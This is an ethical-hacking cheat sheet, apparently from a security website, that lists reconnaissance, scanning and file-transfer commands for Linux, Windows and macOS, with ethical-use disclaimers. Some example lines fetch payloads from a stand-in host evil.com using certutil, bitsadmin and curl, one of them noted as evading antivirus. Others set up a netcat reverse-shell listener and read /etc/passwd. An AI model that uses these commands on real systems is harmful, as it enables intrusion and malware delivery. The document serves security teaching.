← Back

Hacker Terminal Cheat Sheet: Essential Commands for Ethical Hacking

The command line interface (CLI) is the fundamental tool in the arsenal of any cybersecurity professional, ethical hacker, or penetration tester. While powerful graphical tools exist, understanding and mastering the terminal allows for greater flexibility, automation, and a deeper understanding of system interactions.

This cheat sheet provides a quick reference to essential commands across different operating systems, categorized by their typical use in a penetration testing lifecycle. Please note: This guide is intended for educational purposes only, for use in authorized penetration testing, security auditing, and learning environments. Misuse of these commands against systems without explicit permission is illegal and unethical.


Linux (Kali Linux, Ubuntu, etc.)

Linux distributions like Kali Linux are the go-to for most cybersecurity professionals due to their robust toolsets and open-source nature.

I. Information Gathering & Reconnaissance

CommandDescriptionExample Usage
whoamiDisplays the current effective username.whoami
uname -aShows detailed Linux kernel information (OS, hostname, kernel).uname -a
ls / ls -laList directory contents (-a for hidden, -l for details).ls -la /home/user/
pwdPrint working directory (shows current location).pwd
cat <file>Displays the content of a file.cat /etc/passwd
grep <pattern> <file>Searches for patterns in files.grep "admin" /var/log/auth.log
find <path> -name <name>Searches for files and directories.find / -name "config.php"
historyShows command history of the current user.history
ps auxDisplays all running processes on the system.ps aux
crontab -lLists scheduled cron jobs for the current user.crontab -l
df -hReports file system disk space usage (-h for human-readable).df -h

II. Network Scanning & Analysis

CommandDescriptionExample Usage
ping <target>Tests connectivity to a host.ping google.com
ip a / ifconfigDisplays network interface configuration (IP addresses, etc.).ip a
netstat -tulnpLists listening TCP/UDP ports and associated processes.netstat -tulnp
traceroute <target>Traces the route packets take to a host.traceroute 8.8.8.8
dig <domain> ADNS lookup for A (address) records.dig example.com A
nmap -sS <target>Stealth (SYN) port scan.nmap -sS 192.168.1.1
nmap -sV <target>Service version detection scan.nmap -sV 192.168.1.1
nmap -O <target>OS detection scan.nmap -O 192.168.1.1
nmap -p- <target>Scans all 65535 ports.nmap -p- 192.168.1.1
nmap -A <target>Aggressive scan (OS, service, script, traceroute).nmap -A 192.168.1.1
nc -lvnp <port>Netcat listener (simple listener for reverse shells).nc -lvnp 4444
nc <target> <port>Netcat client (connects to a port).nc 192.168.1.10 80

III. File Transfer & Management

CommandDescriptionExample Usage
wget <URL>Downloads files from the web.wget http://example.com/malware
curl <URL>Transfers data from or to a server.curl -O http://example.com/file.txt
scp <source> <destination>Securely copies files between hosts.scp user@remote:/path/file .
python3 -m http.serverStarts a simple Python HTTP server for file transfer.python3 -m http.server 8000

Windows (Command Prompt / PowerShell)

Windows commands are crucial for enumerating targets and often for post-exploitation activities. PowerShell is increasingly powerful.

I. Information Gathering & Reconnaissance

CommandDescriptionExample Usage
whoamiDisplays current user information.whoami
systeminfoShows detailed system configuration information.systeminfo
verDisplays the Windows version.ver
dirLists directory contents.dir C:\Users\Public
type <file>Displays the content of a text file.type C:\Windows\system.ini
tasklistLists all running processes.tasklist /svc
net userLists local user accounts.net user
net localgroupLists local groups and their members.net localgroup administrators
schtasks /query /fo LIST /vDisplays scheduled tasks.schtasks /query /fo LIST /v
driverqueryLists installed device drivers.driverquery
wmic qfe get Caption,HotFixID,InstalledOnLists installed hotfixes (patches).wmic qfe get Caption,HotFixID,InstalledOn

II. Network Scanning & Analysis

CommandDescriptionExample Usage
ping <target>Tests network connectivity.ping 192.168.1.1
ipconfig /allDisplays full TCP/IP configuration.ipconfig /all
netstat -anoDisplays active network connections, listening ports, PID.netstat -ano
tracert <target>Traces the route to a destination.tracert google.com
nslookup <domain>Queries DNS servers for domain name information.nslookup example.com
net viewDisplays network resources (computers, shares).net view
net useManages network connections to shared resources.net use \\192.168.1.1\share
netsh firewall show stateShows Windows Firewall status.netsh firewall show state
Get-NetIPConfiguration (PS)(PowerShell) Displays network configuration.Get-NetIPConfiguration
Test-NetConnection (PS)(PowerShell) Tests network connectivity and port reachability.Test-NetConnection -ComputerName google.com -Port 443

III. File Transfer & Management

CommandDescriptionExample Usage
certutil.exe -urlcache -f <URL> <outfile>Downloads a file using certutil.exe (often bypasses AV).certutil.exe -urlcache -f http://evil.com/mal.exe mal.exe
bitsadmin /transfer <job_name> <URL> <outfile>Downloads files using BITSAdmin (background intelligent transfer service).bitsadmin /transfer mydownload http://evil.com/file.txt C:\file.txt
copy <source> <destination>Copies files.copy C:\temp\exploit.exe \\share\exploit.exe

macOS (Terminal)

macOS, being Unix-based, shares many commands with Linux, but also has its own unique utilities.

I. Information Gathering & Reconnaissance

CommandDescriptionExample Usage
whoamiDisplays the current effective username.whoami
sw_versShows macOS version information.sw_vers
sysctl -n kern.versionDisplays kernel version.sysctl -n kern.version
ls / ls -laList directory contents (-a for hidden, -l for details).ls -la /Users/Shared
pwdPrint working directory (shows current location).pwd
cat <file>Displays the content of a file.cat /etc/hosts
grep <pattern> <file>Searches for patterns in files.grep "admin" /var/log/system.log
find <path> -name <name>Searches for files and directories.find /Users -name "*.kext"
ps auxDisplays all running processes on the system.ps aux
launchctl listLists loaded launchd jobs (services, agents).launchctl list
df -hReports file system disk space usage (-h for human-readable).df -h

II. Network Scanning & Analysis

CommandDescriptionExample Usage
ping <target>Tests connectivity to a host.ping 192.168.1.1
ifconfigDisplays network interface configuration (IP addresses, etc.).ifconfig en0
netstat -anLists active network connections and listening ports.netstat -an
traceroute <target>Traces the route packets take to a host.traceroute 8.8.8.8
dig <domain> ADNS lookup for A (address) records.dig example.com A
/usr/sbin/networksetup -listallnetworkservicesLists all network services./usr/sbin/networksetup -listallnetworkservices
/usr/sbin/networksetup -getinfo "Wi-Fi"Gets detailed information for a specific network service./usr/sbin/networksetup -getinfo "Wi-Fi"
lsof -iLists open files and network connections.sudo lsof -i :80
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -sScans for available Wi-Fi networks./System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s

III. File Transfer & Management

CommandDescriptionExample Usage
curl <URL>Transfers data from or to a server.curl -O http://evil.com/file.txt
wget <URL>Downloads files from the web (may need to be installed via Homebrew).wget http://example.com/malware
scp <source> <destination>Securely copies files between hosts.scp user@remote:/path/file .

Important Ethical Hacking Principles:

  • Always Get Permission: Never use these commands on systems or networks you do not own or have explicit written permission to test. Unauthorized access is illegal.
  • Scope Definition: Clearly define the scope of your penetration test before you begin.
  • Documentation: Document every command, every finding, and every step of your process.
  • Legal & Ethical Boundaries: Operate strictly within legal and ethical boundaries.
  • Knowledge is Power (and Responsibility): Understand the impact of each command before you execute it.

This cheat sheet serves as a starting point. The world of ethical hacking is vast and constantly evolving. Continuous learning, practice in controlled environments, and a strong ethical compass are the true keys to becoming a proficient and responsible cybersecurity professional.


***
Note on Content Creation: This article was developed with the assistance of generative AI like Gemini or ChatGPT. While all public AI strives for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.